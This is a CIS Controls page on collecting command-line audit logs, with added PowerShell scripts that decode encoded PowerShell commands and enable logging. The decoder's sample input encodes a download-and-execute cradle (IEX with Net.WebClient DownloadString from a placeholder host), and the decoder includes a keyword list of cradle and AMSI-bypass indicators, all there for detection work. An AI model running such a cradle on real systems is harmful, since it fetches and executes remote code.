8.8 (IG2, IG3)

Collect Command-Line Audit Logs

Control Group: 8. Audit Log Management
Asset Type: Devices
Security Function: Detect

Description

Collect command-line audit logs. Example implementations include collecting audit logs from PowerShell®, BASH™, and remote administrative terminals.

Implementation Checklist

1. Deploy detection tools or enable detection capabilities
2. Configure alerting thresholds and notification channels
3. Establish monitoring schedule and review process
4. Test detection capabilities with simulated events
5. Document detection procedures and escalation paths
6. Enable logging on all in-scope systems
7. Configure log forwarding to centralized SIEM
8. Define log retention periods per policy
9. Establish log review schedule and procedures

Threats & Vulnerabilities (CIS RAM)

Threat Scenarios

Living-Off-the-Land Attack Evasion

Confidentiality

Attackers use built-in OS tools such as PowerShell, cmd.exe, bash, and WMI to run malicious commands that blend in with routine administrative activity. Without command-line logging, these fileless attacks leave no record for detection or forensics.

Obfuscated PowerShell Payload Execution

Integrity

Malicious PowerShell scripts that use encoded commands (-EncodedCommand), AMSI bypass techniques, and in-memory module loading run on endpoints with no record of the commands actually executed, so credential harvesting, lateral movement, and data staging go undetected.
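The encoded-command evasion above is only effective while nobody looks at the command line. As an added example (not part of the CIS page), the function below takes process command lines as they would appear in the CommandLine field of Security event 4688 or Sysmon event 1, finds a -EncodedCommand (or its -e/-ec/-enc abbreviations) argument, decodes the UTF-16LE base64 payload, and flags keywords typical of download cradles and AMSI bypasses. The function name, the keyword list and the sample command lines (including the example.invalid URL) are constructed for illustration; once script block logging is on, the decoded text also appears directly in event 4104, so this is most useful for estates that only have 4688 or for correlating the two.

```powershell
# Added example, not from the CIS page: decode -EncodedCommand payloads found in
# process-creation command lines so reviewers see what was actually run.
function Get-EncodedPowerShellPayload {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$CommandLine
    )
    process {
        # powershell.exe accepts -e, -ec, -enc and -EncodedCommand; the payload is base64 of UTF-16LE text
        $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})')
        if (-not $m.Success) { return }
        try {
            $bytes   = [Convert]::FromBase64String($m.Groups[1].Value)
            $decoded = [Text.Encoding]::Unicode.GetString($bytes)
        } catch {
            $decoded = "<base64 decode failed: $($_.Exception.Message)>"
        }
        # Illustrative keyword list (an assumption, tune for your estate); -match is case-insensitive
        $hits = @(
            'IEX', 'Invoke-Expression', 'DownloadString', 'Net.WebClient',
            'AmsiUtils', 'amsiInitFailed', 'FromBase64String', '-nop', '-w hidden'
        ) | Where-Object { $decoded -match [regex]::Escape($_) -or $CommandLine -match [regex]::Escape($_) }
        [pscustomobject]@{
            CommandLine = $CommandLine
            Decoded     = $decoded
            Indicators  = @($hits)
            Suspicious  = (@($hits).Count -gt 0)
        }
    }
}

# Constructed sample input: one download cradle encoded the way an attacker would encode it,
# plus benign lines that must not be flagged.
$samplePayload = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/p.ps1")'
$sampleB64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($samplePayload))
$sampleLines = @(
    "powershell.exe -NoP -W Hidden -Enc $sampleB64",
    'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ec $sampleB64",
    'cmd.exe /c whoami /all'
)

# Only the two encoded lines produce output; both decode to the cradle and carry indicators
$sampleLines | Get-EncodedPowerShellPayload | Format-List
```

To run this against live data, feed the CommandLine field of 4688 events (or the Sysmon event 1 CommandLine) into the function instead of `$sampleLines`; any result with `Suspicious` set is a review item, and the `Decoded` text is what goes into the incident record.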

Unauthorized Remote Administration via Command Line

Confidentiality

Attackers run commands through remote administrative tools (PsExec, SSH, WinRM) on compromised systems. Without command-line audit logs, the organization cannot detect the activity or reconstruct what the attacker did on each compromised host.

Vulnerabilities (When Safeguard Absent)

PowerShell Script Block and Module Logging Disabled

Windows endpoints do not have PowerShell script block logging (event 4104), module logging (event 4103), or transcription enabled, so there is no visibility into the PowerShell commands and scripts actually executed on enterprise assets.

No Process Command-Line Auditing on Endpoints

Operating systems are not configured to include command-line arguments in process creation audit events (on Windows, Security event 4688 carries the command line only when "Include command line in process creation events" is enabled; on Linux, auditd records it only when an execve rule is loaded). Security tools then see the process name but not the parameters passed to it, so malicious intent hides behind a legitimate executable.
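Both gaps above (PowerShell logging off, and 4688 without command lines) close with a handful of policy settings. The script below is an added example, not a CIS-supplied procedure: run elevated on a standalone host, it writes the documented Group Policy backing registry values for script block logging, module logging and transcription, enables the command-line field in 4688, turns on the Process Creation audit subcategory with auditpol, and then reads everything back. The transcript directory `C:\PSTranscripts`, the verification function name and the choice to log every module (`*`) are assumptions made for the example; in a domain, set the equivalent GPO and use only the verification part.

```powershell
# Added example, not from the CIS page: enable and verify the logging safeguard 8.8 relies on.
# Run in an elevated session. Registry paths/values are the documented policy backing keys.
$psPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
$transcriptDir = 'C:\PSTranscripts'   # assumption: pick a location standard users cannot modify

$settings = @{
    "$psPolicy\ScriptBlockLogging" = @{ EnableScriptBlockLogging = 1 }   # event 4104, PowerShell/Operational log
    "$psPolicy\ModuleLogging"      = @{ EnableModuleLogging = 1 }        # event 4103
    "$psPolicy\Transcription"      = @{ EnableTranscripting = 1; EnableInvocationHeader = 1; OutputDirectory = $transcriptDir }
    $auditKey                      = @{ ProcessCreationIncludeCmdLine_Enabled = 1 }   # command line in Security event 4688
}

foreach ($path in $settings.Keys) {
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    foreach ($name in $settings[$path].Keys) {
        New-ItemProperty -Path $path -Name $name -Value $settings[$path][$name] -Force | Out-Null
    }
}

# Module logging only records modules listed under ModuleNames; '*' records all of them
$moduleNames = "$psPolicy\ModuleLogging\ModuleNames"
if (-not (Test-Path $moduleNames)) { New-Item -Path $moduleNames -Force | Out-Null }
New-ItemProperty -Path $moduleNames -Name '*' -Value '*' -Force | Out-Null

New-Item -ItemType Directory -Path $transcriptDir -Force | Out-Null

# 4688 is only generated when the Process Creation subcategory is audited
auditpol.exe /set /subcategory:"Process Creation" /success:enable /failure:enable | Out-Null

# Read the configuration back and confirm events are actually being produced.
# Note: the auditpol string match assumes an English-language system.
function Test-CommandLineAuditConfig {
    [pscustomobject]@{
        ScriptBlockLogging   = (Get-ItemProperty "$psPolicy\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
        ModuleLogging        = (Get-ItemProperty "$psPolicy\ModuleLogging" -ErrorAction SilentlyContinue).EnableModuleLogging -eq 1
        Transcription        = (Get-ItemProperty "$psPolicy\Transcription" -ErrorAction SilentlyContinue).EnableTranscripting -eq 1
        CmdLineIn4688        = (Get-ItemProperty $auditKey -ErrorAction SilentlyContinue).ProcessCreationIncludeCmdLine_Enabled -eq 1
        ProcessCreationAudit = ((auditpol.exe /get /subcategory:"Process Creation") -join "`n") -match 'Success and Failure'
        Recent4688           = $null -ne (Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 1 -ErrorAction SilentlyContinue)
        Recent4104           = $null -ne (Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 1 -ErrorAction SilentlyContinue)
    }
}

Test-CommandLineAuditConfig
```

Every property in the returned object should be True; `Recent4104` turns True as soon as any script block runs after the setting takes effect (this script itself produces one). The verification output is also a reasonable "detection tool deployment evidence" artifact for the Evidence Requirements below when captured per host.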

Evidence Requirements

Type      | Evidence Item                                                            | Collection Frequency
Technical | Detection tool deployment evidence (dashboard screenshots, agent status) | Captured monthly
Technical | Sample alert/detection output demonstrating capability                   | Captured quarterly
Technical | SIEM dashboard showing log sources and collection status                 | Captured monthly
Record    | Log review records and findings                                          | Per review cycle
Document  | Governing policy document (current, approved, communicated)             | Reviewed annually